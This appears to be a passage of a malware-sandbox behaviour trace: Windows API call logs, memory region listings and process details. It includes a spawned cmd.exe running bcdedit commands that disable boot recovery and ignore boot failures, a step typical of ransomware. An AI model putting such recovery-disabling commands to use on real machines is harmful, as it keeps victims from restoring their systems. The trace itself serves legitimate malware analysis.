0x7fef6df8750 [0153.716] GetCurrentThreadId () returned 0xf74 [0153.716] RtlCaptureStackBackTrace (in: FramesToSkip=0x1, FramesToCapture=0x8, BackTrace=0x7fef9e8a580, BackTraceHash=0x0 | out: BackTrace=0x7fef9e8a580*=0x13f7eac3d, BackTraceHash=0x0) returned 0x8 [0153.716] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x4) returned 0x49ba60 [0153.716] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x49ba60, pulNumLanguages=0xeae8f0 | out: pulNumLanguages=0xeae8f0) returned 1 [0153.716] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49ba60 | out: hHeap=0x460000) returned 1 [0153.716] GetCurrentThreadId () returned 0xf74 [0153.716] RtlCaptureStackBackTrace (in: FramesToSkip=0x1, FramesToCapture=0x8, BackTrace=0x7fef9e8a5d0, BackTraceHash=0x0 | out: BackTrace=0x7fef9e8a5d0*=0x13f7eb191, BackTraceHash=0x0) returned 0x8 [0153.796] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0153.805] SetLastError (dwErrCode=0x0) [0153.805] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xeae800 | out: pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xeae800) returned 1 [0153.805] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8) returned 0x49baf0 [0153.805] SetLastError (dwErrCode=0x0) [0153.805] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x49baf0, pcchLanguagesBuffer=0xeae800 | out: pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x49baf0, pcchLanguagesBuffer=0xeae800) returned 1 [0153.805] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8) returned 0x49ba60 [0153.805] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49baf0 | out: hHeap=0x460000) returned 1 [0153.805] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x49b660 [0153.805] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x49b660, pulNumLanguages=0xeae8f8 | out: pulNumLanguages=0xeae8f8) returned 1 [0153.805] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49b660 | out: hHeap=0x460000) returned 1 [0153.806] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0153.806] malloc (_Size=0x60) returned 0xdc8d0 [0153.806] malloc (_Size=0x28) returned 0xdf390 [0153.806] malloc (_Size=0x32) returned 0xcff70 [0153.809] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.810] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x2 [0153.810] ?GetQualifierSet@CWbemClass@@UEAAJPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.810] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.810] ?Release@CClassQualifierSet@@UEAAKXZ () returned 0x1 [0153.810] ?Release@CWbemObject@@UEAAKXZ () returned 0x1 [0153.810] malloc (_Size=0x20e) returned 0xdfe00 [0153.810] CLSIDFromString (in: lpsz="{84CA6FD6-B152-4e6a-8869-FDE5E37B6157}", pclsid=0xdc908 | out: pclsid=0xdc908*(Data1=0x84ca6fd6, Data2=0xb152, Data3=0x4e6a, Data4=([0]=0x88, [1]=0x69, [2]=0xfd, [3]=0xe5, [4]=0xe3, [5]=0x7b, [6]=0x61, [7]=0x57))) returned 0x0 [0153.810] free (_Block=0xdfe00) [0153.810] malloc (_Size=0x20) returned 0xdf420 [0153.810] ?GetNames@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAPEAUtagSAFEARRAY@@@Z () returned 0x0 [0153.811] SafeArrayGetElemsize (psa=0x4dca40) returned 0x8 [0153.811] SafeArrayPutElement (psa=0x4dca40, rgIndices=0xeae540, pv=0x4db668) returned 0x0 [0153.811] SafeArrayPutElement (psa=0x4dca40, rgIndices=0xeae540, pv=0x4dcab8) returned 0x0 [0153.811] SafeArrayPutElement (psa=0x4dca40, rgIndices=0xeae540, pv=0x4b6608) returned 0x0 [0153.811] SafeArrayPutElement (psa=0x4dca40, rgIndices=0xeae540, pv=0x4dcab8) returned 0x0 [0153.811] SafeArrayRedim (in: psa=0x4dca40, psaboundNew=0xeae558 | out: psa=0x4dca40) returned 0x0 [0153.811] SafeArrayCopy (in: psa=0x4dca40, ppsaOut=0xeae4a0 | out: ppsaOut=0xeae4a0) returned 0x0 [0153.811] SafeArrayGetLBound (in: psa=0x4dd140, nDim=0x1, plLbound=0xeae6b8 | out: plLbound=0xeae6b8) returned 0x0 [0153.811] SafeArrayGetUBound (in: psa=0x4dd140, nDim=0x1, plUbound=0xeae6a0 | out: plUbound=0xeae6a0) returned 0x0 [0153.811] SafeArrayGetElement (in: psa=0x4dd140, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.812] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.812] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.812] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.812] SafeArrayGetElement (in: psa=0x4dd140, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.812] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.812] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.812] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.812] SafeArrayGetElement (in: psa=0x4dd140, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.812] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.812] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.813] memcpy (in: _Dst=0xeae460, _Src=0x4e524d, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.813] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.813] malloc (_Size=0x28) returned 0xdf660 [0153.813] malloc (_Size=0x8) returned 0x1de600 [0153.813] SafeArrayGetElement (in: psa=0x4dd140, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.813] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.814] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.814] memcpy (in: _Dst=0xeae460, _Src=0x4e5337, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.814] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.814] malloc (_Size=0x28) returned 0xdf690 [0153.814] malloc (_Size=0x10) returned 0x1de700 [0153.814] memmove_s (in: _Destination=0x1de700, _DestinationSize=0x8, _Source=0x1de600, _SourceSize=0x8 | out: _Destination=0x1de700) returned 0x0 [0153.814] free (_Block=0x1de600) [0153.815] malloc (_Size=0xd0) returned 0xdfe00 [0153.815] malloc (_Size=0x10) returned 0x1de600 [0153.815] free (_Block=0x1de600) [0153.815] malloc (_Size=0x10) returned 0x1de600 [0153.815] free (_Block=0x1de600) [0153.815] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.815] malloc (_Size=0x22) returned 0xdf6c0 [0153.815] malloc (_Size=0x20e) returned 0xdfee0 [0153.815] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.815] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.815] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.815] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.815] free (_Block=0xdfee0) [0153.816] malloc (_Size=0x10) returned 0x1de600 [0153.816] free (_Block=0x1de600) [0153.816] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.816] malloc (_Size=0x26) returned 0xdf6f0 [0153.816] malloc (_Size=0x24) returned 0xdf720 [0153.816] malloc (_Size=0x20e) returned 0xdfee0 [0153.816] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.816] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.816] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.816] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.816] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.817] free (_Block=0xdfee0) [0153.817] malloc (_Size=0x10) returned 0x1de600 [0153.817] free (_Block=0x1de600) [0153.817] free (_Block=0xdf660) [0153.817] free (_Block=0xdf690) [0153.817] free (_Block=0x1de700) [0153.817] malloc (_Size=0x4a8) returned 0xdfee0 [0153.817] CoGetCallContext (in: riid=0x7fef6df1610*(Data1=0x13e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppInterface=0xeae798 | out: ppInterface=0xeae798*=0x4ba9a0) returned 0x0 [0153.817] CServerSecurity::ImpersonateClient () returned 0x0 [0153.818] CServerSecurity::Release () returned 0x1 [0153.818] GetCurrentThread () returned 0xfffffffffffffffe [0153.818] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0xeae7e0 | out: TokenHandle=0xeae7e0*=0x224) returned 1 [0153.818] GetTokenInformation (in: TokenHandle=0x224, TokenInformationClass=0x9, TokenInformation=0xeae7d0, TokenInformationLength=0x4, ReturnLength=0xeae7d8 | out: TokenInformation=0xeae7d0, ReturnLength=0xeae7d8) returned 1 [0153.818] CloseHandle (hObject=0x224) returned 1 [0153.818] WmiOpenBlock () returned 0x1068 [0153.818] GetTickCount () returned 0x205b267 [0153.818] _vsnwprintf (in: _Buffer=0xdff74, _BufferCount=0x1ff, _Format="WDM specific return code: %lu\n", _ArgList=0xeae7b8 | out: _Buffer="WDM specific return code: 4200\n") returned 31 [0153.822] ?SpawnInstance@CWbemClass@@UEAAJJPEAPEAUIWbemClassObject@@@Z () returned 0x0 [0153.822] ?Put@CWbemInstance@@UEAAJPEBGJPEAUtagVARIANT@@J@Z () returned 0x0 [0153.823] malloc (_Size=0x40) returned 0xe0390 [0153.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WDM specific return code: 4200\n", cchWideChar=32, lpMultiByteStr=0xe0390, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDM specific return code: 4200\n", lpUsedDefaultChar=0x0) returned 32 [0153.824] GetTickCount () returned 0x205b267 [0153.824] free (_Block=0xe0390) [0153.824] GetTickCount () returned 0x205b267 [0153.824] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0153.824] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0153.824] free (_Block=0xdfee0) [0153.824] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0153.824] free (_Block=0xcff70) [0153.824] free (_Block=0xdf6f0) [0153.824] free (_Block=0xdf720) [0153.824] free (_Block=0xdf6c0) [0153.824] free (_Block=0xdfe00) [0153.824] free (_Block=0xdf420) [0153.824] free (_Block=0xdf390) [0153.824] free (_Block=0xdc8d0) [0153.825] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7fef6df8750 [0153.825] GetCurrentThreadId () returned 0xf74 [0153.825] RtlCaptureStackBackTrace (in: FramesToSkip=0x1, FramesToCapture=0x8, BackTrace=0x7fef9e8a620, BackTraceHash=0x0 | out: BackTrace=0x7fef9e8a620*=0x13f7eac3d, BackTraceHash=0x0) returned 0x8 [0153.825] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x4) returned 0x49baf0 [0153.825] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x49baf0, pulNumLanguages=0xeae8f0 | out: pulNumLanguages=0xeae8f0) returned 1 [0153.825] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49baf0 | out: hHeap=0x460000) returned 1 [0153.826] GetCurrentThreadId () returned 0xf74 [0153.826] RtlCaptureStackBackTrace (in: FramesToSkip=0x1, FramesToCapture=0x8, BackTrace=0x7fef9e8a670, BackTraceHash=0x0 | out: BackTrace=0x7fef9e8a670*=0x13f7eb191, BackTraceHash=0x0) returned 0x8 Thread: id = 91 os_tid = 0x6d0 Thread: id = 92 os_tid = 0x6b4 [0250.691] DllCanUnloadNow () returned 0x1 [0250.692] DllCanUnloadNow () returned 0x1 Thread: id = 93 os_tid = 0x6ec Thread: id = 94 os_tid = 0x2e4 Thread: id = 95 os_tid = 0x484 Thread: id = 96 os_tid = 0x614 Thread: id = 97 os_tid = 0x288 Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x35794000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xed8" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1977 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1978 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1979 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1980 start_va = 0x200000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1981 start_va = 0x4aad0000 end_va = 0x4ab28fff monitored = 1 entry_point = 0x4aad90b4 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1982 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1983 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1984 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1985 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1986 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1987 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1988 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1989 start_va = 0x300000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1990 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1991 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1992 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1993 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1994 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1995 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1996 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1997 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1998 start_va = 0x7fef28d0000 end_va = 0x7fef28d7fff monitored = 0 entry_point = 0x7fef28d11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1999 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2000 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2001 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2002 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2003 start_va = 0xc0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2004 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2005 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2006 start_va = 0x1d0000 end_va = 0x1f8fff monitored = 0 entry_point = 0x1d1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2007 start_va = 0x580000 end_va = 0x707fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2008 start_va = 0x1d0000 end_va = 0x1f8fff monitored = 0 entry_point = 0x1d1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2009 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2010 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2011 start_va = 0x710000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 2012 start_va = 0x8a0000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 2013 start_va = 0x1d0000 end_va = 0x1effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2014 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2015 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2016 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2017 start_va = 0x1ca0000 end_va = 0x1f6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 105 os_tid = 0xd54 [0150.276] GetProcAddress (hModule=0x77710000, lpProcName="SetConsoleInputExeNameW") returned 0x77720c80 [0150.277] GetProcessHeap () returned 0x480000 [0150.277] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x4012) returned 0x49c6b0 [0150.277] GetProcessHeap () returned 0x480000 [0150.277] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49c6b0 | out: hHeap=0x480000) returned 1 [0150.278] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0150.278] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0150.278] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0150.278] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0150.278] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0150.278] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0150.278] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0150.278] GetProcessHeap () returned 0x480000 [0150.278] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xb0) returned 0x499ee0 [0150.278] GetProcessHeap () returned 0x480000 [0150.278] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x20) returned 0x494780 [0150.280] GetProcessHeap () returned 0x480000 [0150.280] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x78) returned 0x499fa0 [0150.281] GetProcessHeap () returned 0x480000 [0150.281] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xb0) returned 0x49a020 [0150.282] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0150.282] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0150.282] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0150.282] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0150.282] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0150.282] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0150.282] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0150.282] GetProcessHeap () returned 0x480000 [0150.282] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xb0) returned 0x49a0e0 [0150.282] GetProcessHeap () returned 0x480000 [0150.282] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x20) returned 0x4947b0 [0150.283] GetProcessHeap () returned 0x480000 [0150.283] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x56) returned 0x498640 [0150.284] GetConsoleTitleW (in: lpConsoleTitle=0x2ff3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.284] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0150.284] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0150.284] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0150.284] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0150.285] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0150.285] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0150.285] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0150.285] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0150.285] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0150.285] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0150.285] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0150.285] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0150.285] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0150.285] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0150.285] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0150.285] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0150.285] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0150.285] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0150.285] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0150.285] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0150.285] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0150.285] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0150.285] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0150.285] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0150.285] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0150.285] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0150.285] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0150.285] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0150.285] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0150.285] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0150.285] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0150.285] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0150.286] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0150.286] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0150.286] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0150.286] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0150.286] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0150.286] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0150.286] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0150.286] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0150.286] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0150.286] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0150.286] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0150.286] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0150.286] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0150.286] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0150.286] _wcsicmp (_String1="bcdedit", 